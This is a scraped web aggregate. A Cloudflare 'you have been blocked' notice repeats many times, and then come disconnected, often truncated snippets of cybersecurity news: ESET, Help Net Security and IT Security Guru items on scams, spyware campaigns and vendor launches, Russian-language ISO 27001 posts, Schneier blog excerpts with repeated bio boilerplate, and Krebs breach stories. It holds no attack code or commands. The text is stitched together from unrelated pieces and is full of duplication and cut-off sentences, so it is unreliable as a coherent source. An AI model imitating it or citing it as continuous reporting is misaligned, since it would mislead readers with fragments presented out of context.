The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Imagine an even worse outcome: you are approached by someone or see an advert offering cryptocurrency recovery services.

Unfortunately, this type of “recovery fraud” is increasingly common, and even the FBI has issued a Public Service Announcement (PSA) about it last year.

How do crypto recovery scams work?

Sample messages peddling cryptocurrency recovery services in discussion forums (click to enlarge)Some crypto recovery scammers are advertising their wares via low-cost online press release distribution services.

Avoiding crypto theftGranted, the best way to avoid crypto recovery scams is not to have your digital currency stolen in the first place.

Considering the potential influences of these responsibilities on business functions, it’s prudent to open a conversation about offloading certain tasks through an MDR service.

Additionally, the service also includes all modules of ESET PROTECT Elite, the ESET MDR service, and ESET Premium Support Essential.

An MDR service offers a comprehensive solution in a unified experience.

As such, these days, it is not only businesses themselves that acknowledge the need for robust cybersecurity solutions.

For enterprises looking to elevate their security posture, ESET PROTECT MDR Ultimate offers proactive prevention with superior protection and, through a tailor-fit security service, enables granula…

David J. Eicher (born August 7, 1961) is an American editor, writer, and popularizer of astronomy and space.

This is of course a very critical time to always remember the question of the future of our home planet.

We take Earth as a habitat and our life on Earth for granted.

Some argue that it doesn't make sense to explore the depths of space when we need to address serious problems here on Earth.

What do you think are the greatest benefits of what we have already learned about the universe and space?

The investigation uncovered at least 40,000 phishing domains that were linked to LabHost and tricked victims into handing over their sensitive detailsOne of the world’s largest phishing-as-a-service (Phaas) platforms known as LabHost has been disrupted in a global law enforcement operation, Europol has announced.

Some 10,000 people across the world used the service, with the monthly fee averaging $249.

The investigation uncovered at least 40,000 phishing domains that were linked to LabHost and tricked users into handing over their sensitive details.

Learn more about the sting in the video – and make sure you know how to avoid falling victim to a phishing attack.

In other cybercrime news, US…

Let’s look a little more closely at these and some other benefits that have ultimately made Python the go-to language for many professionals, including in cybersecurity.

By offering a comprehensive toolkit for a wide range of tasks, it can be a universal language for cybersecurity professionals.

By harnessing Python's extensive libraries and frameworks, developers can leverage pre-built modules to accelerate development cycles and enhance functionality.

Python’s versatility extends beyond security-specific automation, however, as it enables organizations to automate also administrative tasks, such as user provisioning and system configuration management, with ease.

From threat intelligence …

VideoWhat makes Starmus unique?

– A Q&A with award-winning filmmaker Todd MillerThe director of the Apollo 11 movie shares his views about the role of technology in addressing pressing global challenges as well as why he became involved with Starmus.

24 Apr 2024

We spoke to Michel Mayor about the importance of public engagement with science and fostering responsibility among the youth for the preservation of our changing planetJoin us as we speak to the Nobel Prize-winning astronomer Michel Mayor about the intersection of technology and scientific discovery, the art of making science accessible to all, and the imperative of nurturing environmental stewardship among the youth.

In this short video, Professor Mayor offers his quick takes on:the role of technology in driving scientific progressstrategies for communicating complex scientific concepts to the broader publicfostering a sense of responsibility among the youth towards the preservation of pla…

Dr. Israelian talks about Starmus's vision and mission, the importance of inspiring and engaging audiences, and the strong sense of community within the Starmus universeIn this exclusive interview, we delve into the heart of the Starmus Festival with Dr. Garik Israelian, an astrophysicist and the visionary force behind the festival.

Join us as Dr. Israelian shares his views about Starmus's vision and mission, the importance of inspiring and engaging audiences, and the sense of community within the Starmus universe.

What’s the goal of Starmus?

How is the Starmus community evolving?

What empowering messages does Starmus convey to the youth?

What are the risks and consequences of having your health data exposed and what are the steps to take if it happens to you?

Attackers behind the disruptive ransomware attack at medical firm Change Healthcare in late February have begun to leak what they claim are corporate and patient data stolen during the attack.

In this week's video, Tony looks at the risks and consequences of having your health data exposed and the steps you should take if your data is exposed.

This is impersonation fraud, and it’s fast becoming one of the highest earners for cybercriminals.

What does impersonation fraud look like?

Fake social media accounts are a growing challenge; used to spread scam links and too-good-to-be-true offers.

Bogus notificationUnusual messages: Phishing emails often contain inconsistencies which mark them out as impersonation fraud.

With any impersonation fraud, the key is: be skeptical, slow down, and independently verify they are who they say they are.

From promoting questionable content to posing security risks, inappropriate ads present multiple dangers for children.

With the rise of social media influencers and curated online content, ads often portray an idealized version of reality that may not reflect the complexities of everyday life.

Parents or responsible adults must help children critically evaluate media messages and develop a balanced perspective.

Security and privacy risksSome ads that children may be exposed to can pose significant security and privacy risks.

From promoting questionable content to posing financial, security, and privacy risks, ads present multiple dangers for young minds.

Here’s how cybercriminals target cryptocurrencies and how you can keep your bitcoin or other crypto safeBitcoin is on a tear.

Threat actors are primed and ready to ruthlessly exploit any users lacking digital savvy – via scams and sophisticated malware.

We can divide the main threats into three types: malware, scams and third-party breaches.

Examples of scam sites (source: ESET Threat Report H1 2023)2.

Bogus play-to-earn video game (source: ESET Threat Report H1 2023)3.

Could your messaging app of choice have been authored by a threat actor known as Virtual Invaders?

As described by ESET researchers this week, this is what happened to the victims of an ongoing and targeted Android espionage campaign called eXotic Visit that began in late 2021 and pose as messaging services.

The malicious apps – which were distributed through dedicated websites and even Google Play – masqueraded as messaging services, but came bundled with the XploitSPY malware.

The campaign appears to have targeted people mainly in Pakistan and India.

To learn more, watch the video and make sure to read the full blogpost.

But they could also expose them to exploitative advertising, inappropriate content, and security and privacy risks.

The challenge for parents is compounded by complex privacy settings, opaque privacy policies, regulatory loopholes, weak enforcement and our own lack of awareness.

Limited privacy information: Despite regulatory requirements in many jurisdictions, kids’ apps can feature opaque privacy/security policies which make it unclear how your child’s data will be used and protected.

Security risks: Mobile apps also pose significant security risks.

Educate your children about the importance of protecting their personal information and the potential consequences of security and privacy ri…

At that time, there were five apps available, using the names ChitChat.apk, LearnSindhi.apk, SafeChat.apk, wechat.apk, and wetalk.apk.

Dink Messenger on Google Play implemented emulator checks (just as Alpha Chat), whereas the one on the dedicated website did not.

Sim Info reached over 30 installs on Google Play; we have no information about when it was removed from the store.

The Specialist Hospital app, available on GitHub, poses as the app for Specialist Hospital in India (specialisthospital.in); see Figure 10.

However, the same GitHub account now hosts several new malicious apps available for download.

Dear Naked Security readers,Firstly, thank you for your interest, your time, and your contributions to the Naked Security community.

We have recently added the extensive catalog of Naked Security articles to the Sophos News blog platform, enabling us to provide all Sophos security research, insights, and intelligence in a single location.

We are redirecting articles from Naked Security to Sophos News and you can continue to access the Naked Security article library whenever you need it.

You can find their articles in the Security Operations, Threat Research and AI Research sections of this blog.

Whether you’re a threat hunter, security administrator, IT/security generalist, home user or mor…

Mom’s Meals issues “Notice of Data Event”: What to know and what to do

S3 Ep149: How many cryptographers does it take to change a light bulb?

Using WinRAR?

Be sure to patch against these code execution bugs…

Have you listened to our podcast?

“Snakes in airplane mode” – what if your phone says it’s offline but isn’t?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

S3 Ep147: What if you type in your password during a meeting?

Have you listened to our podcast?

Trellix has unveiled Trellix Wise, a powerful suite of traditional and Generative Artificial Intelligence (GenAI) tools to drastically reduce cyber risk.

Trellix Wise extends across the Trellix XDR Platform to discover and neutralize threats more efficiently while lowering security operations costs.

With Trellix Wise, automatic alert investigation ensures alerts are quickly triaged, scoped, and assessed.

It delivers real time operational threat intelligence leveraging 68 billion queries a day on malicious activity from more than 100 million endpoints.

Trellix Wise connects hundreds of security tools and can be implemented in on-premises and cloud environments.

Since 2013, the first Thursday in May is marked as World Password Day, a day dedicated to raising awareness about the need for using strong, unique passwords to secure out digital lives.

New offerings and extended passkey supportJust in time for 2024 World Password Day, various companies have launched and/or announced new authentication-related offerings.

Microsoft has announced passkey support for consumer accounts and is adding support for device-bound passkeys in the Microsoft Authenticator mobile app.

After having launched passkey support for Google Accounts, Google Workspace and Google Cloud accounts last year, the tech behemoth says that they will soon support the use of passkeys to e…

Cyble is launching Cyble Vision X, the successor to its Cyble Vision 2.0 threat intelligence platform, to elevate the user experience by empowering decision-makers with immediate access to critical information.

Cyble Vision X users can be assured that the transition from Cyble Vision 2.0 will be handled seamlessly and executed in stages.

“The launch of Cyble Vision X will mark a significant achievement in our mission to provide cyber threat intelligence that enables businesses of all sizes to anticipate and respond to the constantly changing threat environment,” said Manish Chachada, COO of Cyble.

Cyble Vision X will still offer a wide range of capabilities, including incident response, sec…

“CylanceMDR offers more than just industry-leading technology; you’re getting a true AI-driven MDR fueled by proprietary threat intelligence.

But we know it’s not enough to have the right technology.

The key is having the right team to back you up,” said Nathan Jenniges, SVP and GM at BlackBerry Cybersecurity.

CylanceMDR also offers an “On-Demand” solution tailored exclusively for customers with established security teams seeking in-depth investigation and response to threats.

In independent testing, Cylance AI threat detection acted up to 13 times faster, preventing 98% of attacks earlier in the kill chain.

Built on the Fortinet operating system, FortiOS, and the latest, fifth-generation Fortinet security processing unit (SP5), the FortiGate 200G series delivers increased firewall throughput, FortiGuard AI-Powered Security Services, and 5GE ports for the new Wi-Fi 7 wireless standard.

The performance and AI-powered features modern campuses needThe FortiGate 200G series was purpose-built to deliver high-performing networking and security capabilities required within the modern campus.

Key features include:NGFW security performance , including 7x greater firewall throughput, 16x greater IPsec VPN throughput, and 2x greater threat protection than the industry average.

, including 7x greater firew…

Nokod Security launched the Nokod Security Platform, enabling organizations to protect against security threats, vulnerabilities, compliance issues, and misconfigurations introduced by LCNC applications and robotic process automations (RPAs).

To overcome this bottleneck, the Nokod Security Platform provides citizen developers clear step-by-step guidance for fixing security issues as well as automated remediation options that can be triggered with the click of a button.

“With Nokod, organizations gain the necessary visibility and control to ensure their digital transformation journey is secure and compliant at all times.”Nokod Security Platform features and benefitsUsing compliance, governan…

Lenovo has launched its new AI-based Cyber Resiliency as a Service (CRaaS) leveraging Lenovo device telemetry and the Microsoft security software portfolio including Microsoft Copilot for Security and Defender for Endpoint.

“Lenovo Cyber Resiliency as a Service helps give business leaders assurance of their entire estate via single-pane-of-glass visibility,” said Marc Wheelhouse, Chief Security Officer, Lenovo Solutions and Services Group.

Lenovo CRaaS simplifies security procurement by offering a comprehensive solution that brings the full power of the Microsoft security stack and is fully managed by Lenovo,” added Wheelhouse.

Adopting a cyber resiliency managed service helps improve busin…

ASM, combined with Edgio’s comprehensive web security solutions and managed security services, provides edge-enabled continuous web application threat management service.

Based on the findings from Verizon’s Data Breach Investigation Report (DBIR), over 60% of data breaches were attributed to web applications.

With Edgio ASM, organizations now have the capability to continuously track and inventory all external web assets, automatically detect potential vulnerabilities and security exposures, and provide a centralized interface for security teams to track and manage the remediation of all security issues.

In addition, Edgio provides holistic Web Application and API Protection (WAAP) to prot…

Gurucul announced REVEAL, a unified security analytics platform.

Intelligent data engine and unified data fabric provides full visibility by interpreting any data collected from any data source in any format, including structured and unstructured data.

provides full visibility by interpreting any data collected from any data source in any format, including structured and unstructured data.

Gurucul federated search allows analysts to run queries from a single console across any data source including data lakes, cloud object storage, databases, identity systems, threat intel sources, and SIEMs – including Splunk.

REVEAL empowers organizations with full control over data and significant cost s…

Orum launched No Code Verify, which helps businesses and institutions determine whether a bank account is open and valid before initiating payments — all without integrating an API.

The new technology, launched in October 2023, makes it easy for businesses and banks to verify the status of any type of bank account.

Failed payments cost the global economy over $100B each year, a problem Verify solves by completing bank account verification within 15 seconds.

Enables non-technical support to easily upload files and validate bank accounts before issuing payments, helping fuel transformation and modernization.

Orum has built new technology that leverages the Fed Now and RTP payment rails to pro…

Average ransom payment has increased 500% in the last year, according to Sophos.

Organizations that paid the ransom reported an average payment of $2 million, up from $400,000 in 2023.

Excluding ransoms, the survey found the average cost of recovery reached $2.73 million, an increase of almost $1 million since the $1.82 million that Sophos reported in 2023.

The skyrocketing costs of ransomware attacks belie the fact that this is an equal opportunity crime.

The average ransom payment came in at 94% of the initial ransom demand.

Businesses worldwide have faced a rate of change in the threat environment evidenced by 95% of companies reporting cybersecurity strategy adjustments within just the past year, according to LogRhythm.

Continuing positive news, 79% of security professionals now rate their security defense as either good or excellent.

Even more concerning, 61% of security teams are still using manual and time-intensive approaches to share security status information.

Security teams need to be armed with enhanced case management metrics and advanced analytics to make informed decisions quickly.

The research examined several facets of cybersecurity, drawing on insights from a global survey of 1,176 security exe…

Cybersecurity mesh architecture (CSMA) is a set of organizing principles used to create an effective security framework.

8 core capabilities of a well-designed CSMATo understand how a cybersecurity mesh architecture incorporates its eight core capabilities, it’s essential to see it as a comprehensive approach that enhances an organization’s cybersecurity posture through a distributed and interconnected framework.

This is accomplished by integrating data from the mesh of detection systems along with structured data from threat intelligence feeds.

Behavioral and contextual data for transactions and requests also inform CSMA intelligence.

CSMA does not displace security information and event m…

58% of the organizations were affected by a SaaS security incident in the last 18 months, according to Valence Security’s 2024 State of SaaS Security Report.

Likely, as a result, 96% security leaders have made SaaS security a top priority and 97% have increased SaaS security budgets in 2024.

Top SaaS security challengesThe survey revealed the top security challenges the recipients are experiencing in securing their SaaS applications.

“While a staggering 96% of security leaders prioritize SaaS security, Valence’s report shows the complexity of SaaS security,” says Chris Steffen, VP of Research – Information Security at EMA.

“Security executives responded that their SaaS security challenges a…

On this World Password Day, we should all pause and think about how we can adopt passkeys.

As a form of passwordless authentication, passkeys aim to eliminate the inherent risk factors of traditional credentials.

Why not go further than “thinking and reading about passkeys?” Try passkeys!

In the spirit of World Password Day, now let’s delve into better password hygiene and password management practices.

Plus, with a password manager, there is only one password you’ll have to remember: the one for your vault.

It’s World Password Day 2024!

This includes educating them about common password mistakes, such as using easily guessable passwords or reusing passwords across multiple accounts.

Privileged access management software can help with privileged account and session management, secrets management and enterprise password management.

Do we send them their First Day Password in Plain Text over the airways, surely no one will intercept that?

In our recent 2024 Breached Password Report, we discovered that one of the most common breached passwords included the terms “New Hire”.

K-12 schools are increasingly becoming targets for cyberattacks, highlighting the urgent need for robust cybersecurity measures.

Over the past few years, there has been a significant increase in cyberattacks targeting K-12 schools.

For example, in 2023 80% of K-12 schools fell victim to ransomware attacks.

K-12 schools face significant challenges in deploying cybersecurity technology due to budget constraints.

A solution has been developed by local company LANRover with cybersecurity company Centripetal to provide proactive real-time intelligence powered cybersecurity protection against all known threats for K-12 schools titled CleanINTERNET®.

Synopsys has unveiled Polaris Assist, an innovative AI-powered application security assistant incorporated into the Synopsys Polaris Software Integrity Platform®.

Key Features of Polaris AssistThe inaugural release of Polaris Assist introduces two potent AI-driven functionalities within the Polaris Software Integrity Platform:Polaris AI Issue SummariesPolaris AI Issue Summaries facilitate developers’ understanding and response to static analysis findings.

Polaris AI Fix SuggestionsPolaris AI Fix Suggestions streamline the process of addressing security vulnerabilities by presenting AI-generated code fixes.

“Polaris Assist boosts security and developer productivity, allowing them to more eas…

Today, Keeper Security joins Williams Racing as an Official Partner on the eve of the F1 Miami Grand Prix.

Password management mitigates these risks, and Keeper will become Williams Racing’s Official Password Security Partner.

“Our data is one of our most important assets and protecting it is paramount,” said James Vowles, Team Principal, Williams Racing.

Keeper also embodies the ethos of the team: excellence, pioneering innovation and relentless determination to succeed.”“Partnering with Williams Racing presents an exciting opportunity to showcase Keeper Security’s cutting-edge cybersecurity solutions on the global stage,” said Darren Guccione, CEO and Co-founder, Keeper Security.

Keeper S…

Login credentials are a smart device’s first line of defence against hackers.

If the passwords for smart devices and connected accounts aren’t strong, it means there’s a greater risk of being hacked and misused for malicious purposes.

While most smart devices come with default passwords, some smart devices don’t require authentication at all, which presents a major security risk to the data being processed and the network it’s connected to.

“Oftentimes, smart devices come with additional features and services that might not be necessary.

“Given the mass use of smart devices as primary gateways to the internet, making sure they are secure is critical.

APIContext has unveiled its 2024 Cloud Service Provider API Report, offering an in-depth examination of the performance of leading cloud service providers in the essential API domain.

These interactions were sourced from a netwrok of over 100 geopraphically dispersed cloud data centers, encompassing major public cloud service providers such as AWS, Azure, Google, and IBM.

Achieving 99.99% is the benchmark all API service providers should be aiming for, while 99.999% is the traditional telecommunications standard for service availability – equating to five minutes of downtime in a year.

Despite poorer overall service availability, other quality API metrics improved, and on balance, the API s…

Cato Networks, the SASE leader, today announced that Cato CTRL, the SASE leader’s cyber threat intelligence (CTI) research team, will demonstrate threat actors’ latest tactics designed to capitalise on organisations’ complex security architectures during presentations at the upcoming RSA Conference 2024.

Talks featuring Cato CTRL include:“The Price is WRONG – An Analysis of Security Complexity” on May 6, 2024, at 10:50 a.m. PT.

With data from over 2,200 organisations, Maor will illuminate organisations’ blind spots and limited network visibility.

Maor will be joined by Tal Darsan, manager of managed cybersecurity services at Cato Networks, to reveal the current evasion techniques used by at…

Salt Security have announced the release of its new multi-layered OAuth protection package to detect attempts to exploit OAuth and proactively fix vulnerabilities.

Salt is enhancing its API protection platform with a comprehensive suite of new OAuth threat detections and posture rules to address the growing challenge of OAuth exploitation.

Salt Security’s recent investigation exposed several critical security flaws within the OAuth implementations of popular ChatGPT plug-ins.

Salt Security’s OAuth Protection Package provides robust OAuth defences that help organisations achieve several critical security objectives.

In fact, within just five days of the OAuth protection package being deploye…

Two formidable female tech leaders have joined forces to launch an innovative new leadership development and mentoring platform for the cyber community – Leading Cyber.

Leading Cyber was unveiled ahead of the duo visiting UK Cyber Week in London and the leadership development and mentoring platform concept will connect cyber security leaders around the world.

The innovative platform will build a global online community for cyber security leaders and cyber business owners to share, connect and grow.

Danielle is the Founder and Managing Director of Durham based Inside Out, an internal communications consultancy that has successfully penetrated the tech, HE and cyber security sectors building …

Last week, the IT Security Guru team attended Cydea’s Risk Management Platform launch in London.

Firstly, what is the new Cydea Risk Management platform?

And the financial quantification is the cherry on top: the ROI is immediately obvious!”Cydea’s Risk Management Platform is built on the popular as-a-service model that is currently booming.

Building Cydea Risk Platform was no different.

Cydea Risk Platform helps organisations to have better conversations about cyber risk.

It finds that most businesses see “offensive AI” fast becoming a standard tool for cybercriminals, with 93% of security leaders expecting to face daily AI-driven attacks.

The research, Cyber security in the age of offensive AI, surveyed security leaders in the UK and US about their experience with AI as a tool in cybersecurity, enhancing both offensive and defensive capabilities.

It reveals that not only do most security leaders expect daily AI-driven attacks, two-thirds (65%) expect that offensive AI will be the norm for cybercriminals, used in most cyber attacks.

Only 11% of security leaders see bot attacks as the greatest cyber threat facing their business, below ransomware, phishing, an…

Coalition, the world’s first Active Insurance provider designed to prevent digital risk before it strikes, today published its 2024 Cyber Claims Report, which details emerging cyber trends and their impact on Coalition policyholders throughout 2023.

While these tools can help to reduce cyber risk, using some boundary devices can actually increase the likelihood of a cyber claim if they have known vulnerabilities.

Other key findings from the report include:Overall claims frequency increased 13% year-over-year (YoY), and overall claims severity increased 10% YoY, resulting in an average loss of $100,000.

FTF frequency increased by 15% YoY, and severity increased by 24%, to an average loss of …

According to the Department for Science, Innovation and Technology (DSIT), only 17% of the UK cyber sector workforce is female, and this is down from 22% in 2022.

As we know, the cyber sector is a male-dominated space, and therefore women aren’t necessarily presented with the same opportunities.

For instance, they might shy away from applying to a cybersecurity role unless they match every single piece of criteria.

Is there anything that can be used to incentivise women to work in the cyber sector?

Prominent female role models and leaders are crucial when it comes to making cyber more attractive for women.

KnowBe4, the provider of the world’s largest security awareness training and simulated phishing platform, today announced it has entered into a definitive agreement to acquire Egress, a leader in adaptive and integrated cloud email security.

Egress’ Intelligent Email Security suite provides a set of scaled, AI-enabled security tools with adaptive learning capabilities to help prevent, protect and defend organisations against sophisticated email cybersecurity threats.

By acquiring Egress, KnowBe4 plans to deliver a single platform that aggregates threat intelligence dynamically, offering AI-based email security and training that is automatically tailored relative to risk.

KnowBe4 recently an…

ISO Survey 2022: ISO 27001 certificates (ISMS) from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001ISO опубликовала свежую стаистику по выданным сертификатам. Я же обновил свою презентацию по сертификатам ISO 27001 (ISMS).Всего в 2022 году было зарегистрировано 71 549 сертификатов ISO 27001. Это на 22% больше, чем в 2021 году.ТОП 10 стран по количеству сертификатов:1. China - 263012. Japan - 69873. United Kingdom of Great Britain and Northern Ireland - 60844. India - 29695. Italy - 24246. United States of America - 19807. Netherlands - 17418. Germany - 15829. Spain - 156110. Israel - 1467Для сравнения, в РФ в 2022 году было зарегистрировано (осталось) только 30 сертификатов, а в 2021 было 95…

Выложил на Udemy свой первый курс по подготовке к сертификационному аудиту СУИБ по ISO 27001, "ISO 27001:2022. How to prepare for a certification audit"На нем я разбираю задачи, которые надо сделать До. Во время и После сертификационного аудита. Курс на английском языке.

Cybersecurity Frameworks for DMZCON23 230905.pdf from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001

My 15 Years of Experience in Using Mind Maps for Business and Personal Purposes from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001

From NIST CSF 1.1 to 2.0.pdf from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001

Всем привет. Пропал, каюсь, работы слишком много :(А пока принес вам 40% скидку на все курсы и сертификации от Linux Foundation. Скидка действует только сегодня.Если кто давно планировал сдать что-то серьезное по k8s, Linux или из DevOps — самое время. Например Certified Kubernetes Administrator (CKA) и Certified Kubernetes Security Specialist (CKS) бандлом стоит $435 вместо $725.Экзамен можно сдать в течении года после покупки> https://training.linuxfoundation.org/end-of-summer-2023/

The UK Bans Default PasswordsThe UK is the first country to ban default passwords on IoT devices.

On Monday, the United Kingdom became the first country in the world to ban default guessable usernames and passwords from these IoT devices.

The Product Security and Telecommunications Infrastructure Act 2022 (PSTI) introduces new minimum-security standards for manufacturers, and demands that these companies are open with consumers about how long their products will receive security updates for.

It banned default passwords in 2018, the law taking effect in 2020.

IoT manufacturers aren’t making two devices, one for California and one for the rest of the US.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

During the Cold War, the US Navy tried to make a secret code out of whale song.

The basic plan was to develop coded messages from recordings of whales, dolphins, sea lions, and seals.

The message structure couldn’t just substitute the moaning of a whale or a crying seal for As and Bs or even whole words.

In addition, the sounds Navy technicians recorded between 1959 and 1965 all had natural background noise.

Repeated blasts of the same sounds with identical extra noise would stand out to even untrained sonar operators.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

The advent of AI threatens to destroy the complex online ecosystem that allows writers, artists, and other creators to reach human audiences.

It quickly became apparent that the deluge of media made many of the functions that traditional publishers supplied even more necessary.

Technology companies developed automated models to take on this massive task of filtering content, ushering in the era of the algorithmic publisher.

Unlike human publishers, Google cannot read.

Protecting the web, and nourishing human creativity and knowledge production, is essential for both human and artificial minds.

The law can’t stop privacy consent from being a fairy tale, but the law can ensure that the story ends well.

In the European Union, the General Data Protection Regulation (GDPR) uses the express consent approach, where people must voluntarily and affirmatively consent.

Because it conceptualizes consent as mostly fictional, murky consent recognizes its lack of legitimacy.

To return to Hurd’s analogy, murky consent is consent without magic.

Murky consent should be subject to extensive regulatory oversight with an ever-present risk that it could be deemed invalid.

Former senior White House cyber policy director A. J. Grotto talks about the economic incentives for companies to improve their security—in particular, Microsoft:Grotto told us Microsoft had to be “dragged kicking and screaming” to provide logging capabilities to the government by default, and given the fact the mega-corp banked around $20 billion in revenue from security services last year, the concession was minimal at best.

[…]“The government needs to focus on encouraging and catalyzing competition,” Grotto said.

He believes it also needs to publicly scrutinize Microsoft and make sure everyone knows when it messes up.

“At the end of the day, Microsoft, any company, is going to respond mo…

Using Legitimate GitHub URLs for MalwareInteresting social-engineering attack vector:McAfee released a report on a new LUA malware loader distributed through what appeared to be a legitimate Microsoft GitHub repository for the “C++ Library Manager for Windows, Linux, and MacOS,” known as vcpkg.

The attacker is exploiting a property of GitHub: comments to a particular repo can contain files, and those files will be associated with the project in the URL.

What this means is that someone can upload malware and “attach” it to a legitimate and trusted project.

For example, a threat actor could upload a malware executable in NVIDIA’s driver installer repo that pretends to be a new driver fixing i…

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

Surprising no one, the incident is not unique:The OpenJS Foundation Cross Project Council received a suspicious series of emails with similar messages, bearing different names and overlapping GitHub-associated emails.

These emails implored OpenJS to take action to update one of its popular JavaScript projects to “address any critical vulnerabilities,” yet cited no specifics.

The email author(s) wanted OpenJS to designate them as a new maintainer of the project despite having little prior involvement.

This approach bears strong resemblance to the manner in which “Jia Tan” positioned themselves in the XZ/liblzma backdoor.

[…]The OpenJS team also recognized a similar suspicious pattern in two …

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

Ransom_man announced on the dark web that he would start publishing 100 patient profiles every 24 hours.

When Vastaamo declined to pay, ransom_man shifted to extorting individual patients.

KrebsOnSecurity detailed the work of HTP in September 2013, after the group compromised servers inside data brokers LexisNexis, Kroll, and Dun & Bradstreet.

The group used the same ColdFusion flaws to break into the National White Collar Crime Center (NWC3), a non-profit that provides research and investigative support to the U.S. Federal Bureau of Investigation (FBI).

Ransom_man bragged about Vastaamo’s sloppy security, noting the company had used the laughably weak username and password “root/root” to p…

In February 2020, the FCC put all four wireless providers on notice that their practices of sharing access to customer location data were likely violating the law.

The FCC found Verizon sold access to customer location data (indirectly or directly) to 67 third-party entities.

The carriers promised to “wind down” location data sharing agreements with third-party companies.

The fine amounts vary because they were calculated based in part on each day that the carriers continued sharing customer location data after being notified that doing so was illegal (the agency also considered the number of active third-party location data sharing agreements).

The FCC notes that AT&T and Verizon took more…

The protection scheme was exposed in 2022 when Russian authorities arrested six members of the group, which sold millions of stolen payment cards at flashy online shops like Trump’s Dumps.

Tsaregorodtsev was head of the counterintelligence department for a division of the FSB based in Perm, Russia.

In February 2022, Russian authorities arrested six men in the Perm region accused of selling stolen payment card data.

The FSB arrested Tsaregorodtsev, and seized $154,000 in cash, 100 gold bars, real estate and expensive cars.

The stolen customer payment card details were then sold on sites like Trump’s Dumps and Sky-Fraud.

Rescator said the data exposed included employer, name, address, phone, taxable income, tax refund amount, and bank account number.

KrebsOnSecurity sought comment from the Secret Service, South Carolina prosecutors, and Mr. Keel’s office.

The AP says South Carolina paid $12 million to Experian for identity theft protection and credit monitoring for its residents after the breach.

Mr. Keel’s assertion that somehow the efforts of South Carolina officials following the breach may have lessened its impact on citizens seems unlikely.

It remains unclear why Shefel has never been officially implicated in the breaches at Target, Home Depot, or in South Carolina.

